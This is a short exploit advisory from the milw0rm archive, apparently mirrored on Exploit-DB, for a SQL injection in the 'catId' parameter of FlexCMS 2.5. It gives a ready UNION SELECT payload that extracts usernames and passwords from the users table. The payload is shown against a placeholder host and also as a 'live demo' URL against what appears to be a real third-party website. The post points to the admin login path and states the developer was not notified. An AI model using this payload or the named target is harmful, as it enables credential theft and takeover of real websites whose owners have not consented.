FlexCMS 2.5 - 'catId' SQL Injection

EDB-ID:

8018




Platform:

PHP

Date:

2009-02-09


AUTHOR: MisterRichard

FlexCMS Remote SQL Injection

Discovered by MisterRichard.

Developer site: http://www.flexcms.dk/

Developer has not been notified.

Live demo:

Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

Admin login site:

http://target.com/flexadmin/

Greetz, agonx, kollek, cardingnu

# milw0rm.com [2009-02-09]